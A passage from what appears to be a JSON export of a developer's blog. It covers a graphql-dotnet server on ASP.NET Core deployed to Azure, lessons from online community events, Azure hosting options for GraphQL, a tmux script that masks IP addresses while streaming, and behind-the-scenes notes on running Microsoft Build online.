For the data, we’ll use Open Trivia DB.\n.NET Types First up, we’re going to need some generic .NET types that will represent the underlying data structure for our application. These would be the DTOs (Data Transfer Objects) that we might use in Entity Framework, but we’re just going to run in memory.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 public class Quiz { public string Id { get { return Question.ToLower().Replace(" ", "-"); } } public string Question { get; set; } [JsonPropertyName("correct_answer")] public string CorrectAnswer { get; set; } [JsonPropertyName("incorrect_answers")] public List<string> IncorrectAnswers { get; set; } } As you can see, it’s a fairly generic C# class. We’ve added a few serialization attributes to help converting the JSON to .NET, but otherwise it’s nothing special. It’s also not usable with GraphQL yet and for that, we need to expose the type to a GraphQL schema, and to do that we’ll create a new class that inherits from ObjectGraphType<Quiz> which comes from the GraphQL.Types namespace:\n1 2 3 4 5 6 7 8 9 10 11 12 public class QuizType : ObjectGraphType<Quiz> { public QuizType() { Name = "Quiz"; Description = "A representation of a single quiz."; Field(q => q.Id, nullable: false); Field(q => q.Question, nullable: false); Field(q => q.CorrectAnswer, nullable: false); Field<NonNullGraphType<ListGraphType<NonNullGraphType<StringGraphType>>>>("incorrectAnswers"); } } The Name and Description properties are used provide the documentation for the type, next we use Field to define what we want exposed in the schema and how we want that marked up for the GraphQL type system. We do this for each field of the DTO that we want to expose using a lambda like q => q.Id, or by giving an explicit field name (incorrectAnswers). Here’s also where you control the schema validation information as well, defining the nullability of the fields to match the way GraphQL expects it to be represented. This class would make a GraphQL type representation of:\n1 2 3 4 5 6 type Quiz { id: String! question: String! correctAnswer: String! incorrectAnswers: [String!]! } Finally, we want to expose a way to query our the types in our schema, and for that we’ll need a Query that inherits ObjectGraphType:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 public class TriviaQuery : ObjectGraphType { public TriviaQuery() { Field<NonNullGraphType<ListGraphType<NonNullGraphType<QuizType>>>>("quizzes", resolve: context => { throw new NotImplementedException(); }); Field<NonNullGraphType<QuizType>>("quiz", arguments: new QueryArguments() { new QueryArgument<NonNullGraphType<StringGraphType>> { Name = "id", Description = "id of the quiz" } }, resolve: (context) => { throw new NotImplementedException(); }); } } Right now there is only a single type in our schema, but if you had multiple then the TriviaQuery would have more fields with resolvers to represent them. We’ve also not implemented the resolver, which is how GraphQL gets the data to return, we’ll come back to that a bit later. This class produces the equivalent of the following GraphQL:\n1 2 3 4 type TriviaQuery { quizzes: [Quiz!]! quiz(id: String!): Quiz! 
} Creating a GraphQL Schema With the DTO type, GraphQL type and Query type defined, we can now implement a schema to be used on the server:\n1 2 3 4 5 6 7 public class TriviaSchema : Schema { public TriviaSchema(TriviaQuery query) { Query = query; } } Here we would also have mutations and subscriptions, but we’re not using them for this demo.\nWiring up the Server For the Server we integrate with the ASP.NET Core pipeline, meaning that we need to setup some services for the Dependency Injection framework. Open up Startup.cs and add update the ConfigureServices:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 public void ConfigureServices(IServiceCollection services) { services.AddTransient<HttpClient>(); services.AddSingleton<QuizData>(); services.AddSingleton<TriviaQuery>(); services.AddSingleton<ISchema, TriviaSchema>(); services.AddGraphQL(options => { options.EnableMetrics = true; options.ExposeExceptions = true; }) .AddSystemTextJson(); } The most important part of the configuration is lines 8 - 13, where the GraphQL server is setup and we’re defining the JSON seralizer, System.Text.Json. All the lines above are defining dependencies that will be injected to other types, but there’s a new type we’ve not seen before, QuizData. This type is just used to provide access to the data store that we’re using (we’re just doing in-memory storage using data queried from Open Trivia DB), so I’ll skip its implementation (you can see it on GitHub).\nWith the data store available, we can update TriviaQuery to consume the data store and use it in the resolvers:\n1 2 3 4 5 6 7 8 9 10 11 12 public class TriviaQuery : ObjectGraphType { public TriviaQuery(QuizData data) { Field<NonNullGraphType<ListGraphType<NonNullGraphType<QuizType>>>>("quizzes", resolve: context => data.Quizzes); Field<NonNullGraphType<QuizType>>("quiz", arguments: new QueryArguments() { new QueryArgument<NonNullGraphType<StringGraphType>> { Name = "id", Description = "id of the quiz" } }, resolve: (context) => data.FindById(context.GetArgument<string>("id"))); } } Once the services are defined we can add the routing in:\n1 2 3 4 5 6 7 8 9 10 11 12 public void Configure(IApplicationBuilder app, IWebHostEnvironment env) { if (env.IsDevelopment()) { app.UseDeveloperExceptionPage(); app.UseGraphQLPlayground(); } app.UseRouting(); app.UseGraphQL<ISchema>(); } I’ve put the inclusion GraphiQL. within the development environment check as that’d be how you’d want to do it for a real app, but in the demo on GitHub I include it every time.\nNow, if we can launch our application, navigate to https://localhost:5001/ui/playground and run the queries to get some data back.\nDeploying to App Service With all the code complete, let’s look at deploying it to Azure. For this, we’ll use a standard Azure App Service running the latest .NET Core (3.1 at time of writing) on Windows. We don’t need to do anything special for the App Service, it’s already optimised to run an ASP.NET Core application, which is all this really is. If we were using a different runtime, like Node.js, we’d follow the standard setup for a Node.js App Service.\nTo deploy, we’ll use GitHub Actions, and you’ll find docs on how to do that already written. You’ll find the workflow file I’ve used in the GitHub repo.\nWith a workflow committed and pushed to GitHub and our App Service waiting, the Action will run and our application will be deployed. 
The demo I created is here.\nConclusion Throughout this post we’ve taken a look at how we can create a GraphQL server running on ASP.NET Core using graphql-dotnet and deploy it to an Azure App Service.\nWhen it comes to the Azure side of things, there’s nothing different we have to do to run the GraphQL server in an App Service than any other ASP.NET Core application, as graphql-dotnet is implemented to leverage all the features of ASP.NET Core seamlessly.\nAgain, you’ll find the complete sample on my GitHub for you to play around with yourself.\n", "id": "2020-07-21-graphql-on-azure-part-2-app-service-with-dotnet" }, { "title": "Online Events, Experience From Three Perspectives", "url": "https://www.aaron-powell.com/posts/2020-07-20-online-events-experience-from-three-perspectives/", "date": "Mon, 20 Jul 2020 10:09:33 +1000", "tags": [ "public-speaking", "conference", "user-group" ], "description": "Online events are the way of the times, let's touch on a few things I've learnt from them so far", "content": "The world has moved to online events for the time being, and over the past few months I’ve attended and spoken at a number of user groups, conferences and solo live streams so I thought I’d share some insights on what I’ve learnt from them, so in this post I want to share the views as an attendee or speaker or organiser. My goal here isn’t to discuss all the complex tool chains you can setup with NDI, OBS and thousands of dollars’ worth of hardware, instead I want to look at things that I’ve seen working to make a community work in an online space.\nHosting Online This is an obvious starting place for us, what are you going to use to host the online event? There are a few factors to consider in this space, but I think the most important first decision is what style of event do you want to host and there are two styles I’ve seen used, conference call or broadcast.\nConference Call Style Let’s talk about this style of event first as it is what people have the most experience with, there’s a good chance you’re doing one or more of these a day already! Tools like Microsoft Teams and Zoom play nicely in this space and have free tiers (or you “know someone with a paid account”) to get an event setup.\nAs an attendee they are a bit of a mixed bag. Often you’ll need to install a desktop/mobile app to use them, rather than just relying on your browser and this can be a bit of a turn off for some people if they can’t install something on their device or have concerns about the invasiveness nature of some of these apps.\nOnce you’re in though, they are a good attendee experience. You can see each other, you can chat, and if feels a bit like you’re socialising with others, even if you’re all behind cameras. But this is a double-edged sword from a speaker and organiser perspective.\nSince conference call tools tend not to have an owner for the event (generally) but are more a communal space, you can end up with the same faux pas of the common conference call, people not muting and limited control over attendee contributions. I was attending a meetup the other day and another attendee was multi-tasking by watching something else, but not on mute, so their audio bleared over the presenter and the hosts couldn’t do anything about it but constantly calling out to the person to mute themselves. But let’s leave moderation to the side for now as there’s a bigger piece I want discuss there.\nWhat about being a speaker? 
I really like about presenting on conference call style events because you can see the audience reactions. Presenting online is hugely difference to presenting in person and the main thing I miss is being able to see the audience reactions. Are they losing focus? playing on their phones? falling asleep? Being able to get this sort of feedback helps adjust how you present and even if you can only see a few of the attendee’s cameras it can be really useful to boost someone’s confidence. Ultimately, it feels like it’s more personal when presenting on a conference call style event.\nBroadcast Style This brings me to the other style of online events, broadcast style. Tools that fall into this category are ones like Microsoft Teams Live, YouTube Live and Twitch, and sometimes a middleperson broadcast platform will be used like StreamYard or Restream.\nFrom the attendee perspective these can toe the line on being an engaging learning session and a dreaded webinar, you know the one I mean where the presenter is so far removed from the audience that you may as well be doing something else because it’s just downright boring and an engaging experience. For proof that this can work as a community platform you need to look no further than Twitch. While Twitch is primarily used by gamers, there’s plenty of developer streams out there too, with more seeming to pop up every week.\nAs an organiser looking to do broadcast style I can’t recommend more highly than using a service like StreamYard or Restream. These platforms offer a web interface that you run your event via and push out to anywhere that supports RTMP and this is what services like Twitch or YouTube Live consume. The two services that I’ve mentioned both have free tiers that are adequate enough for what most community events need, offering multiple presenters, screenshare with picture-in-picture and a backstage area without the need to dive into tools like OBS and learning video production. Paid plans focusing on features like removing the services watermark, customising the scenes more and streaming to more locations at once.\nFor a user group, being able to stream out to a single location is more than adequate as it helps you focus your community around one place (useful for ongoing discussions post-stream) and the same goes for solo streaming. I personally stream using Restream to Twitch, but also to YouTube Live as it saves the video to my YouTube channel. And this is another benefit of broadcast style, they (generally) make it easy to get a video export of the event to upload somewhere if it’s not automatically recorded.\nThe primary drawback with middleperson broadcast services is that there is additional lag between the presenter and the audience, so this can make engaging with the audience a bit trickier. So, it’s best to play around with destination platforms a bit, but I’ve found Twitch is the closest to real-time.\nAs a speaker, this is my preferred style of event. To present I don’t have to install anything new, it’s just a browser which I screen share/allow my camera access to and I can get down to presenting. Yes, it’s true that you lose the ability to “see” the audience, since there’s no other video/audio on the feed (likely just the organisers), but that can help reduce nerves if you’re not confident public speaking as you can’t see anyone. 
I have more confidence in that I’m not going to get interrupted while speaking and can engage with the audience as I desire.\nI will say this though, landing a joke when you’ve got no feedback other than a delayed chat… that’s hard!\nBeing a Community Something that is really important to remember when going down the path of online events is that you’re a community, whether it’s a user group, conference or your own stream, and that community is the most important part. These are places not just where people learn about something, they are also places where people catch up with friends so it’s important to think about how you’ll build that in an online space.\nModeration I touched on this briefly above, but an important thing to look at when doing online events is how you’re going to do moderation. When you’re doing events in a conference call style this is inherently challenging, as anyone who does conference calls to work can attest. You’ll have people who forget to mute themselves, people forgetting they have the camera on when they do whatever, people wanting to jump in and ask a question as soon as it pops into their mind or worse, someone violating your Code of Conduct.\nOf all the conference call platforms I’ve used, I’m yet to find one that has decent moderation tools that allow you mute or eject people easily, so this is something that you really need to be on top of as an organiser, how do you create a safe online space, set the stage for the speaker to be comfortable and successful and ensure that the audience is respectful. Thankfully, the worst I’ve been involved with is people forgetting to mute themselves and this results in the speaker/organiser having to be louder and shout-ier than them, but to a degree this reminds me of in-person events when people forget how loud they can be!\nAs an organiser, to be successful you need to make sure that you are actively driving the event, welcome everyone to the event, remind everyone of the expectation you have from them (including the Code of Conduct) and be on top of the chat. You’ll also need to be confident to take drastic steps if necessary, like terminating the event if something did become toxic. You’ll also want to work with your speakers beforehand to make sure they understand the role you’ll play and how you’ll be tackling things like moderation and audience participation. If they want to do Q&A ad-hoc, let the speaker roll with it, otherwise keep an eye on the chat to bring up questions at the end.\nBroadcast platforms make moderation a lot easier, first off, you don’t have audience audio/video to contend with, so you don’t have the unmuted problem to deal with. Also, because they are a bit more asynchronous in their communication, it’s a lot easier as a speaker to delay responding to incoming questions until you’re ready. Some tools even provide you the ability to create a backlog of questions that you can display on-screen for the speaker and audience, which is really helpful as too often we as speakers forget to repeat a question before answering it.\nThe chat platforms on broadcast platforms are also designed to have moderation on them, whether it’s bots, spam filtering or just giving you the ability to delete messages and mute people. As an organiser this sort of thing helps to make sure that the values of your community are upheld and enforceable.\nExpanding Your Reach User groups and conferences are a good example of leveraging privilege, I’m lucky enough to work in the Sydney CBD (well, did!) 
and meetups are located there so I could easily attend them. But they tend to kick off around 6pm to catch people before they go home, and if you don’t work in a short trip to the CBD, you’re probably not going to make them. Or, if you have family commitments (I have 2 young kids), staying out for a meetup can mean that you sacrifice time with the family. The same goes for conferences, there’s cost to attend, time away from work, travel costs if they aren’t in your city, and all of this means that there’s a lot of people who might want to attend but simply can’t.\nBeing online changes this dynamic, especially while we’re all working from home, as you’ve removed one of the greatest barriers - travel time. Now your event is accessible to more people and improving availability of content is a win for all.\nMy friend Lars put up a poll the other day about online event times:\nNow that a lot of people are working from home, what is the best time for you to attend an online meetup?\n— Lars Klint | 🚜🥑📹 (@larsklint) July 14, 2020 I’ll admit, I was surprised by the response, that people tended to prefer events at the “usual user group time”. The reason that I found this interesting is that it means that the second barrier isn’t really a concern to as many respondents as I expected. For user groups I’ve attended recently, I’ve seen start times ranging from 5.30pm through to 7.30pm and my preference is towards the later side of the equation as this has meant I got time with my kids and wife from when work ended to the event started.\nAs an organiser, timing is something that you want to engage with your community on, what works for the majority and what new people can you attract with by having different options of starting time. And this is where having a platform that records content for you is a bonus, as you then have the event available for those who missed it without much additional effort on the organisers.\nBut as an attendee, I have a whole new world of events I can look to engage with. Now it’s easy to jump on a user group in the US (which happen through my lunchtime generally) and watch on to learn from people elsewhere in the world but still on the content that I’m interested in.\nMore Speakers This is a bit of an extension on the previous point, by lowering the barrier to attend through reduced travel time and/or more flexible start times, you open up to having people outside the usual radius speak. Case in point, last month’s ALT.NET Sydney had someone present from Perth.\nNow you’re able to bring a wider set of voices to your event because you’re only really constrained by what people find to be acceptable waking hours and there’s no reason someone in Europe couldn’t present in Sydney, or someone in Australia can’t speak in the US. So as an organiser you can start looking through your broader networks and thinking of people who you’ve always wanted to have speak but it’s never worked because they were elsewhere in the world.\nAs an attendee, this really excites me as now I can hear from and engage with people anywhere, learning from them directly in a real-time format, not only having the option to watch it online after the fact.\nKeeping the Conversation Going The biggest loss from moving from in person events to online events is losing the hallway track. 
I was discussing this a few weeks ago with some colleagues and one of them remarked that the most successful online events they’ve seen are the ones that don’t focus on the hour/day/week that the event happens, but instead foster an ongoing community space. Setting up a Slack workspace or Discord server in which the speakers can spend time with the attendees and do Q&A, while not replacing the hallway track, does go part of the way to giving people more of a community feeling to it.\nAnother benefit of setting up a server like this is that you can start building a community that’s broader than just the one night a month or one day a year that your event happens, it helps give people a place that they can continue to converse and share their knowledge.\nConclusion We’re going to be doing online events for a while longer, it’s part of the world we now live in and while I don’t feel these are a true replacement for in person events there’s very much a place which they belong.\nFor me as an organiser it means you need to go back to the core of what makes a community, fostering that desire to get together and talk about whatever the topic might be. The tech that you use does play a role in making the events successful, so think about what options you have available and how they fit the kind of event you want to run. Conference call style are great for having that person-to-person feel, but they can struggle with moderation, especially at scale. On the other side broadcast style are easier to moderate but can feel cold.\nOnline events also open up a range of new possibilities for how you can engage with your community, no longer are you bound by the usual time constraints of getting people before they go home, instead maybe it’s possible to be more flexible on when to run so it fits your community.\nAnd don’t forget the value in building the community, giving people a space where they can still talk with the speakers and each other, even beyond just the time and place of the event.\nAs I said at the start, this wasn’t a “here’s the tech” style post, but if you’re looking for ideas here’s a few posts:\nOnline meetups with OBS and Skype Free Microsoft Teams for communities: getting started Inject OBS Studio into Microsoft Teams Have you been attending online events? What have you seen that’s working, or not working well? I’d love to hear your thoughts.\n", "id": "2020-07-20-online-events-experience-from-three-perspectives" }, { "title": "GraphQL on Azure: Part 1 - Getting Started", "url": "https://www.aaron-powell.com/posts/2020-07-13-graphql-on-azure-part-1-getting-started/", "date": "Mon, 13 Jul 2020 14:45:30 +1000", "tags": [ "azure", "serverless", "azure-functions", "graphql" ], "description": "Let's get started looking at GraphQL on Azure", "content": "I’ve done a few posts recently around using GraphQL, especially with Azure Static Web Apps, and also on some recent streams. This has led to some questions coming my way around the best way to use GraphQL with Azure.\nLet me start by saying that I’m by no means a GraphQL expert. In fact, I’ve been quite skeptical of GraphQL over the years.\nIs it just me or does GraphQL look a lot like what OData https://t.co/0P8moaJp6S tried to do? 
#sydjs\n— Aaron Powell (@slace) December 16, 2015 This tweet was my initial observation when I first saw it presented back in 2015 (and I now use it to poke fun at friends) and I still think there is some merit in the comparison, even if it's not 100% valid.\nSo, I am by no means a GraphQL expert, meaning that in this series I want to share my perspective as I come to look at how to do GraphQL with Azure, and in this post we'll look at how to get started with it.\nRunning GraphQL on Azure This question has come my way a few times, "how do you run GraphQL on Azure?" and like any good problem, the answer to it is a solid it depends.\nWhen I've started to unpack the problem with people it comes down to wanting to find a service on Azure that does GraphQL, in the same way that you can use something like AWS Amplify to create a GraphQL endpoint for an application. Presently, Azure doesn't have this as a service offering, and GraphQL as a service is a tricky proposition to me because GraphQL defines how you interface as a client to your backend, but not how your backend works. This is an important thing to understand because the way you'd implement GraphQL would depend on what your underlying data store is: is it Azure SQL or CosmosDB? Maybe it's Table Storage, or a combination of several storage models.\nSo for me the question is really about how you run a GraphQL server, and in my mind this leaves two types of projects; one is that it's a completely new system you're building with no relationship to any existing databases or backends that you've got*, or two, you're looking at how to expose your existing backend in a way other than REST.\n*I want to point out that I'm somewhat stretching the example here. Even in a completely new system it's unlikely you'd have zero integrations to existing systems, I'm more pointing out the two different ends of the spectrum.\nIf you're in the first bucket, the world is your oyster, but you have the potential for choice paralysis; there's no single thing to choose from in Azure, meaning you have to make a lot of decisions to get up and running with GraphQL. This is where having a service that provides you a GraphQL interface over a predefined data source would work really nicely, and if you're looking for this solution I'd love to chat more to provide that feedback to our product teams (you'll find my contact info on my About page). Whereas if you're in the second, the flexibility of not having to conform to an existing service design makes it easier to integrate with. What this means is that you need some way to host a GraphQL server, because when it comes down to it, that's the core piece of infrastructure you're going to need; the rest is just plumbing between the queries/mutations/subscriptions and where your data lives.\nHosting a GraphQL Server There are implementations of GraphQL for lots of languages, so whether you're a .NET or JavaScript dev, Python or PHP, there's going to be an option for you to implement a GraphQL server in whatever language you desire.\nLet's take a look at the options that we have available to us in Azure.\nAzure Virtual Machines Azure Virtual Machines are a natural first step, they give us a really flexible hosting option; you are responsible for the infrastructure so you can run whatever you need to run on it.
Ultimately though, a VM has some drawbacks: you’re responsible for infrastructure security, like patching the host OS, locking down firewalls and ports, etc.\nPersonally, I would skip a VM as the management overhead outweighs the flexibility.\nContainer Solutions The next option to look at is deploying a GraphQL server within a Docker container. Azure Kubernetes Service (AKS) would be where you’d want to look if you’re looking to include GraphQL within a larger Kubernetes solution or wanting to use Kubernetes as a management platform for your server. This might be a bit of overkill if it’s a standalone server, but worthwhile if it’s part of a broader solution.\nMy preferred container option would be Azure Web Apps for Containers. This is an alternative to the standard App Service (or App Service on Linux) but useful if your runtime isn’t one of the supported ones (runtimes like .NET, Node, PHP, etc.). App Service is a great platform to host on, it gives you plenty of management over the environment that you’re running in, but keeps it very much in a PaaS (Platform as a Service) model, so you don’t have to worry about patching the host OS, runtime upgrades, etc., you just consume it. You have the benefit of being able to scale both up (bigger machines) and out (more machines), and building on top of a managed platform like this allows for a lot of scale in the right way.\nAzure Functions App Service isn’t the only way to run a Node.js GraphQL service, and this leads to my preference, Azure Functions with Apollo Server. The reason I like Functions for GraphQL is that I feel GraphQL fits nicely in the Serverless design model (not to say it doesn’t fit others) and thus Functions is the right platform for it. The kinds of use cases that you’re designing your API around will often fit with the notion of the on-demand scale that Serverless provides, but you do have a risk of performance impact due to cold start delays (which can be addressed with Always On plans).\nSummary We’re just getting started on our journey into running GraphQL on Azure. In this post we touched on the underlying services that we might want to look at when it comes to hosting a GraphQL server, with my pick being Azure Functions if you’re doing a JavaScript implementation, and App Service or App Service for Containers for everything else.\nAs we progress through the series we’ll look at each piece that’s important when it comes to hosting GraphQL on Azure, and if there’s something specific you want me to drill down into in more detail, please let me know.\n", "id": "2020-07-13-graphql-on-azure-part-1-getting-started" }, { "title": "Toggling Network Info in tmux", "url": "https://www.aaron-powell.com/posts/2020-06-29-toggling-network-info-in-tmux/", "date": "Mon, 29 Jun 2020 16:10:08 +1000", "tags": [ "random" ], "description": "A little tweak to my tmux setup for privacy needs", "content": "I’ve been doing a bit of live streaming recently (you can catch me on Twitch or YouTube) which means that I’m sharing my desktop on recordings more often, and I like doing this because I’ve spent a bunch of time setting up my terminal (read more here).\nRecently, my colleague Brian Clark pinged me about something he’d noticed on a recent stream, that in my terminal there are some IP addresses (left side of my tmux status bar) and he asked if they were real. And that’s when I realised that I’ve been publishing my home IP address on each stream or video I have published over the last few months!
😂\nNow, to the best of my knowledge this hasn’t been a problem as I haven’t been hacked (to the best of my knowledge!), but still, it’s probably not a great idea to do that, so I quickly reset the modem to get a new external IP but it left the question of how to solve this going forward? The obvious one is to just remove that from the status bar, but I do like having it there when I’m not streaming (it’s useful), so what’s the next option? Well, I could make an overlay to mask it, but that’d only work on stream, what if I’m at an event presenting, they aren’t going to want my overlay hack are they? It’s time for something more creative.\nAnatomy of my IP info The IP information on display generated by this script which is run in context of the tmux status bar, and is just a few commands to get local and remote IP information, and is included using my .tmux.config.\nSo, this is just a shell script, meaning that I can do anything I want to with it, and that got my thinking “how can I detect when to disable it?” and the time I (most) want it disabled is when I have OBS running for a stream. But OBS runs in Windows and tmux is in WSL, so how do we detect it?\nDetecting Windows processes in WSL You’re probably familiar with Windows Task Manager to find processes, but did you know there’s a command line equivalent, tasklist.exe? and WSL ships with Windows interop in the box, which means from WSL I can just run tasklist.exe and get all running Windows tasks! This output can then be passed straight through to grep and we can do a conditional check like so:\n1 2 3 4 5 if tasklist.exe | grep -q 'obs'; then echo "OBS is running" else echo "OBS isn't running" fi Now it’s just a case of swapping in some fake IP addresses when OBS is running and we’re all set!\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 if tasklist.exe | grep 'obs' -q; then echo -n "🏠 #[fg=colour197]192.168.0.0 #[fg=black]|#[fg=colour197] 📡 255.255.255.256" else # Internal IP IP=$(hostname -I | awk {'print $1}') PUBLIC_IP=$(curl -4 ifconfig.co) if [[ "$PUBLIC_IP" = ";; connection timed out; no servers could be reached" ]]; then PUBLIC_IP="Not Available" elif [[ "$PUBLIC_IP" = "" ]]; then PUBLIC_IP="No external access" else PUBLIC_IP=$(curl -4 ifconfig.co) fi echo -n "🏠 #[fg=colour197]$IP #[fg=black]|#[fg=colour197] 📡 $PUBLIC_IP" fi Bonus round: Set fake network info whenever you want This works great, it targets the main scenario of when my IP addresses are being leaked, but it doesn’t cover them all, like when I’m presenting at a user group or conference and I’m not using OBS to produce the output stream. 
In those cases I need some other way to fake out the IP addresses.\nTo do this I wanted to have a key binding in tmux that I could hit which would set something that the script could then test against.\nThe first step is to create a custom option in tmux, and I couldn’t find any documentation on this, but through trial and error, plus reading a lot of other tmux configs, it turns out that you prefix the option with @, so we’ll put that in our .tmux.config:\n1 set -g @show-network true set is an alias for set-option, which is run against tmux (if it wasn’t in the .tmux.config you’d do tmux set-option) and the -g flag says we’re setting this globally on all tmux windows (you can use -w for the current window, but I want it consistent on all), then we give it a name, @show-network, and an initial value of true.\nNow, for the key binding we’ll use bind (or bind-key), provide it the key to bind to and what to do when it’s triggered:\n1 bind o run-shell "if ! $(tmux show-option -gqv @show-network); then tmux set -g @show-network true; else tmux set -g @show-network false; fi" For this, we’re binding to o as the key, meaning it’s modifier + o which, for me, is Ctrl + b, o, but choose whatever you want/have free. This binding will trigger run-shell, to execute either a shell script or an inline script (which I do). The script checks the current @show-network value and flips it. You can probably write this shorter, but the verbosity means I can remember what it does in the future.\nLastly, let’s update the script that shows the network status:\n1 2 3 4 5 if $(tasklist.exe | grep 'obs' -q) || ! $(tmux show-option -gqv @show-network); then echo -n "🏠 #[fg=colour197]192.168.0.0 #[fg=black]|#[fg=colour197] 📡 255.255.255.256" else # snip fi Conclusion This was a fun little dig into how you can customise tmux to fit your needs. With a few edits to the script we can detect running processes that we want to hide the IP info from, and it turned out to be possible to add our own options and fire off a keyboard command to hide it as well.\nThe scripts have been updated on my GitHub repo if you want to grab them.\n", "id": "2020-06-29-toggling-network-info-in-tmux" }, { "title": "New Stream - Series Server to Serverless", "url": "https://www.aaron-powell.com/posts/2020-06-20-new-stream-series-server-to-serverless/", "date": "Sat, 20 Jun 2020 19:10:44 +1000", "tags": [ "dotnet", "serverless", "azure-functions", "azure" ], "description": "Kicking off a new live stream series on converting from ASP.NET Core to Serverless", "content": "I recently started streaming on my Twitch channel and am trying to get into a regular schedule of streaming, so to do that I’m going to kick off a multi-part stream in which we’ll look at porting an ASP.NET Core application to a Serverless application on Azure Functions.\nThe application I’m going to tackle is Blazing Pizza, a workshop from the Blazor team.\nI’ll be streaming every Friday at midday Sydney time (7pm Thursdays PDT) for anyone who wants to join in.
I’m undecided if I’ll do it in C# or F#, but the codebase will end up having both implementations, so I might mix and match between weeks on what is done live and which I do between streams.\nSee you on the stream.\n", "id": "2020-06-20-new-stream-series-server-to-serverless" }, { "title": "Generating TypeScript Types From GraphQL Schemas", "url": "https://www.aaron-powell.com/posts/2020-06-12-generating-typescript-types-from-graphql-schemas/", "date": "Fri, 12 Jun 2020 16:44:27 +1000", "tags": [ "javascript", "typescript", "web", "serverless" ], "description": "A continuation of my live streaming, this time looking at how to generate types from GraphQL.", "content": "Last week I did a live stream on creating a web app with React, TypeScript and GraphQL and there was a question that popped up on whether or not you could generate the TypeScript types from the GraphQL schema, as I was creating them by hand.\nToday, I did a last-minute stream in which I showed how you could do it using GraphQL Code Generator. It was really simple to integrate and what’s more, I found a problem in the types I had written by hand relative to the GraphQL schema, so it’s a win-win. I even showed off how the pull request feature of Static Web Apps works.\n", "id": "2020-06-12-generating-typescript-types-from-graphql-schemas" }, { "title": "Microsoft Build, a Look Back", "url": "https://www.aaron-powell.com/posts/2020-06-04-microsoft-build-a-look-back/", "date": "Thu, 04 Jun 2020 09:52:16 +1000", "tags": [ "speaking", "microsoft" ], "description": "Last week saw Microsoft Build done fully online, but let's talk about how we did it.", "content": "Getting set up for #MSBuild live in the Sydney studio 🤩 pic.twitter.com/3eZdxyDcCS\n— Aaron Powell (@slace) May 19, 2020 Just over a week ago, Microsoft Build was run as a fully online event. This was the first time we’d done a 100% virtual event, but given the global situation, it was the sensibly way to do it.\nIf you didn’t tune in, the format was a 48 hour continuous live stream, consisting of around around 10 different “channels” that you could watch with all sessions delivered live. I was lucky to work with the wonderful Sonia Cuff and Rick Claus to host the APAC edition of the Build News Desk.\nYou can go catch all ~370 sessions from Build on YouTube or go back and relive your favourite memories.\nBut for this post, I want to talk a bit about how we ran the event here in Sydney.\nCreating a Studio In Sydney, we decided to create a “studio” that would be used by myself to do the News Desk duties. This was partly for us to test how we could setup something professional for live streaming, and partly because it was a bit of fun!\nWe setup a studio in the Sydney Microsoft Reactor and cobbled it together with the kit we had available.\nVideo For the camera, we were lucky enough to have access to a high quality streaming camera that we use in the Reactor for events. I’m not really sure what it is, other than it’s big, heavy, expensive and has a massive tripod to mount it on.\nWe had a few redundancy options with the camera, we had a DSLR on hand that could be run on streaming and a high quality webcam. Thankfully, we didn’t have to use them. We didn’t want to have to be swapping out kit on the fly!\nLighting Trying to get our lighting balance right took a lot of work, I had 4 lights dedicated on me (I think I’m still seeing spots 🤣) and another 3 or 4 around the room to help with the ambient light. 
The ones dedicated to me were key lights, like people use for streaming/home office setup, nothing too fancy, while the others were more photography style light boxes, the sort of thing you’d pick up at a camera store, providing back lighting.\nWhile there was overhead lighting in the room (fluro tubes and down lights), we opted not to use them as they are all on different temperatures and hues, making consistent lighting harder to achieve. You may also notice in the background some fun colours, we did that with some small spotlights to breakup the background and to make it pretty.\nAudio Audio was a bit more fun. We didn’t want the headphones + mic-on-desk look, and given we were online for many hours, headphones can be uncomfortable after a while and anyway, they don’t give that true studio look. So we decided to go with an IFB, which is those things that TV hosts have in their ears (you’ll see the clear spiral behind their ears) for the audio out and a lapel mic for audio in. Again, we had redundancy in the form of headphones and a few on-desk mics, which again we didn’t need to use.\nThe ear piece and lapel were connected to a small recorder which gave us control around level/etc. before sending it via USB to the production team. This meant that we could give the cleanest audio we could and reduce the need for editing/balancing before broadcast.\nA Hosts View of the World Putting the finishing touches on my setup for #MSBuild, who's registered and ready for the event 🤩 pic.twitter.com/rhSwDyHaf1\n— Aaron Powell (@slace) May 18, 2020 That’s right, I had 5 screens that I had in my field of view (only 4 in the photo though), and they were:\nSurface Book 2 on desk directly in front with an external screen This acted as my notes screen for talking to guests and the rough outline of the Q&A we’d agreed upon Surface Pro 4 on the desk to my right For Twitter/moderation tool/back channel chats/etc. Return feed from the camera I like to look at myself all day Surface Studio (we actually moved it to below the camera, not beside, to keep the camera in my eye line) This ran the Microsoft Teams call so I could see who I was talking to There was also a 2nd Surface Pro 4 off to my left and on the floor powering the TV behind me, and it wasn’t something that I used because I couldn’t see it. So all in all I had more screens than I could possibly need, but hey, why not have them everywhere!\nAlso, there was a local production crew in Sydney (in another room) that had like 5 screens to monitor all the comms with our Microsoft Studio production team, based in Redmond.\nProduction and Teams I had a local production team who were there to help is we had technical issues, to keep an eye ear into the Redmond production team and to make sure I was kept plied with snacks, but most of the magic happened in Redmond.\nWe used Teams for the event and each of us dialed into separate calls. From there the Redmond production team took over, working some magic to connect us all together. Because we weren’t in the same Teams call as each other it meant that the production team could talk to us individually, so if I wasn’t properly in frame or we were running over time they could pop in my ear, and only my ear.\nAs a techy, I found this whole setup so cool! 
I don’t know how it works behind the scenes, but the fact that we were all on separate calls yet somehow on the same call meant I had to hold back on geeking out too much!\nScripts Time to read the script @SoniaCuff and I have for #MSBuild pic.twitter.com/FoLDGJjWTF\n— Aaron Powell (@slace) May 19, 2020 While we tried to make everything seem as natural as possible, we did have a script to follow and keep us on track as much as we could.\nWhen we were in a session with guests, the hosts (myself, Sonia, Scott, Damian, Dave and Justin) worked with the guests to create a framework for the conversation. While I can’t speak for the others, I tried to keep them a bit loose so that we could follow interesting threads as we chatted, rather than just stepping from one bullet point to the next, and this worked really well. Since you’re not physically in the same location as the person, it’s really hard to read body language, and when you’ve got multiple guests (some for whom English wasn’t their first language) a rough outline made everyone feel more at ease about where we were going.\nBut with the other parts, when it was Rick, Sonia and myself, we tried to be a bit more structured. This meant that we could ensure we were keeping on message about the important things to do with Build, like talking about our not for profit partners, the programs we were running around Build or upcoming sessions.\nTo make sure that we were all in sync with each other, and that we could make the scripted parts feel natural, we had a number of table reads in which we went through the script as though it was live, then tweaked the wording and flow with our script writers. We also had a full day of rehearsals in which we set up as though we were doing the 